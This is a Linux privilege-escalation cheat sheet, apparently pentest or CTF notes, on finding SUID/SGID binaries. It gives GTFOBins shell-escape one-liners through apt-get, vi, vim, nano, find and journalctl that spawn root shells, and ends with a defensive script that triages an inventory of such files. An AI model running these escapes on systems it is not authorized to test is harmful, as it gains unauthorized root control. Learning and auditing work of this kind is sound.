
# SUID/SGID

## SUID/SGID

```
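# Find files with the SUID bit set (symbolic form)
find / -perm -u=s -type f 2>/dev/null

# Find files with SUID configured (octal form, bit set regardless of the other bits)
find / -perm -4000 -type f 2>/dev/null
# Exact match: only entries whose mode is exactly 4755
find / -perm 4755

# Find all the SUID/SGID executables
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null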
```

## Enum SUID / SGID - Find

```
# Find entries under /etc whose mode is exactly 777
find /etc -perm 777
# Find everything owned by a given user
find / -user username

# Find files with SUID configured
find /usr/bin -perm 4755

# Find files with SGID configured
find /usr/bin -perm 2755

# Find files with the Sticky Bit configured
# (-1000 requires the sticky bit; /1444 would also match any file with a read bit set)
find /etc -perm -1000
```

{% embed url="<https://www.redhat.com/sysadmin/audit-permissions-find>" %}

## Setuid

The `setuid` bit appears as an `s` in place of the owner's `x` in the permission string.

```shell-session
find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null
```

## Setgid

```
# -6000 matches root-owned files that have both the setuid and setgid bits set
find / -uid 0 -perm -6000 -type f 2>/dev/null
```

```shell-session
find / -user root -perm -6000 -exec ls -ldb {} \; 2>/dev/null

-rwsr-sr-x 1 root root 85832 Nov 30  2017 /usr/lib/snapd/snap-confine
```

## GTFOBins

{% embed url="<https://gtfobins.github.io/>" %}

### apt-get

```shell-session
sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/sh

# id
uid=0(root) gid=0(root) groups=0(root)
```

### Vi

```
sudo vi
:!sh
```

### More -> Vim

Reduce the terminal size as much as possible to trap More. Once in More, press `v` to enter Vim.

```
# In vim
:set shell=/bin/sh
:shell
```

{% embed url="<https://gtfobins.github.io/gtfobins/vim/>" %}

### Nano

```
./nano
^R^X
reset; sh 1>&0 2>&0
```

{% embed url="<https://gtfobins.github.io/gtfobins/nano/#file-read>" %}

{% embed url="<https://0xss0rz.github.io/2020-08-05-HTB-OpenAdmin/>" %}

### Find

```
find . -exec /bin/sh -p \; -quit
```

{% embed url="<https://gtfobins.github.io/gtfobins/find/>" %}

### Journalctl

```
david@traverxec:~/bin$ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
-- Logs begin at Mon 2019-12-16 07:49:55 EST, end at Mon 2019-12-16 07:50:52 E
Dec 16 07:50:00 traverxec systemd[1]: Starting nostromo nhttpd server...
Dec 16 07:50:00 traverxec systemd[1]: nostromo.service: Can't open PID file /v
Dec 16 07:50:00 traverxec nhttpd[451]: started
Dec 16 07:50:00 traverxec nhttpd[451]: max. file descriptors = 1040 (cur) / 10
Dec 16 07:50:00 traverxec systemd[1]: Started nostromo nhttpd server.
!/bin/bash
root@traverxec:/home/david/bin# cd /root
root@traverxec:~# ls
```

{% embed url="<https://0xss0rz.github.io/2020-08-05-HTB-Traverxec/>" %}

{% embed url="<https://gtfobins.github.io/gtfobins/journalctl/>" %}

### Systemctl

{% embed url="<https://gtfobins.github.io/gtfobins/systemctl/>" %}

## Tool

{% embed url="<https://github.com/Frissi0n/GTFONow>" %}
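
## Audit triage (added example)

The following is an added example, not code from the original page or from GTFOBins: a defender-side triage of the inventory that the `find` commands above produce, rating root-owned SUID/SGID copies of the tools named in the GTFOBins section first. It assumes GNU `find -printf` output in the form `<octal mode> <owner> <path>`; the function names, the watchlist variable and the sample inventory are constructed for illustration (only `snap-confine` comes from the page).

```shell
#!/bin/sh
# Added example: triage a SUID/SGID inventory (defensive audit helper).
# Expected input, one file per line: "<octal mode> <owner> <path>", e.g. from
#   find / -xdev -type f \( -perm -4000 -o -perm -2000 \) -printf '%m %u %p\n' 2>/dev/null

# Assumption: watchlist = basenames of the GTFOBins entries named on this page.
WATCHLIST="apt-get vi vim more nano find journalctl systemctl"

# Constructed sample inventory (only snap-confine appears on the page itself).
SAMPLE_INVENTORY='6755 root /usr/lib/snapd/snap-confine
4755 root /usr/bin/passwd
4755 root /usr/bin/find
2755 root /usr/bin/wall
4755 root /usr/local/bin/nano
4755 alice /home/alice/bin/vim
1777 root /tmp/placeholder'

# classify_suid: read inventory lines on stdin and print
# "<severity> <bits> <owner> <path>" for every setuid/setgid entry.
classify_suid() {
    while read -r mode owner path; do
        case $mode in ''|*[!0-7]*) continue ;; esac   # skip malformed modes
        if [ -z "$path" ]; then continue; fi
        special=$(( (0$mode >> 9) & 7 ))   # 4=setuid, 2=setgid, 1=sticky
        bits=""
        if [ $(( special & 4 )) -ne 0 ]; then bits="suid"; fi
        if [ $(( special & 2 )) -ne 0 ]; then bits="${bits:+$bits+}sgid"; fi
        if [ -z "$bits" ]; then continue; fi           # sticky-only: out of scope
        sev="REVIEW"
        for name in $WATCHLIST; do
            # Root-owned copies of watchlisted tools get top priority.
            if [ "${path##*/}" = "$name" ] && [ "$owner" = "root" ]; then
                sev="HIGH"
            fi
        done
        printf '%s %s %s %s\n' "$sev" "$bits" "$owner" "$path"
    done
}

# high_risk_paths: print only the paths rated HIGH, ready for manual review
# (for example, checking whether the bit is needed or can go with chmod u-s).
high_risk_paths() {
    classify_suid | while read -r sev _bits _owner path; do
        if [ "$sev" = "HIGH" ]; then printf '%s\n' "$path"; fi
    done
}

printf '%s\n' "$SAMPLE_INVENTORY" | classify_suid
```

Storing the classified output after each patch cycle and diffing it against the previous run surfaces newly added SUID/SGID files.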

